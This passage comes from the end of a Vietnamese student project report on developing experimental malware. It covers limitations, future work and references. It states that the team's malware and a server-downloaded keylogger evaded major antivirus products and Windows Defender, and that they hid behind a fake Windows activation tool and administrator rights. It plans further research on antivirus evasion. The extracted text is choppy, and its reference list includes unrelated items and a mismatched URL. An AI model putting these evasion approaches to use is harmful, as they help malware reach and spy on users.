thuật qua mặt Antivirus 5.1.2 Những hạn chế đề tài Hiện phần mềm mã độc chưa thể qua mặt hai phần mềm Antivirus Malwarebytes Cynet Mặc dù phần mềm mã độc qua mặc hầu hết các phần mềm Antivirus lớn Kaspersky, McAfee, Microsoft Nhưng lúc triển khai thử nghiệm nhóm xử lý keylogger tải từ server không bị kiểm tra phần mềm Windows Defendere Microsoft, mà chưa xử lý phần mềm Antivirus khác cài đặt hệ thống người dùng Hạn chế cuối đề tài mã độc phải dựa vào phần mềm trung gian, phần mềm độc hại Active Windows để ẩn náo Phải yêu cầu quyền Administrator từ người dùng tránh né phát Windows Denfender Hướng phát triển đề tài Nghiên cứu sâu giải thuật vượt mặt Antivirus việc giải hạn chế đề tài đề cập Nghiên cứu sâu môi trường công 5.2 Trang 26 BÁO CÁO ĐỒ ÁN NGHIÊN CỨU VÀ PHÁT TRIỂN THỬ NGHIỆM MÃ ĐỘC Tài liệu tham khảo Matthew Munns, TROJAN, Kindle Edition, 2017 Hassan Salmani, Trusted Digital Circuits Hardware Trojan Vulnerabilities, Prevention and Detection Springer (2018) Shamim Miah, Muslims, Schooling and Security_ Trojan Horse, Prevent and Racial Politics-Palgrave Macmillan (2017) Swarup Bhunia, Mark M Tehranipoor (eds.), The Hardware Trojan War_ Attacks, Myths, and Defenses-Springer International Publishing (2018) Virustotal [Online] // Virustotal - 11, 2021 - https://www.snort.org/ Trang 27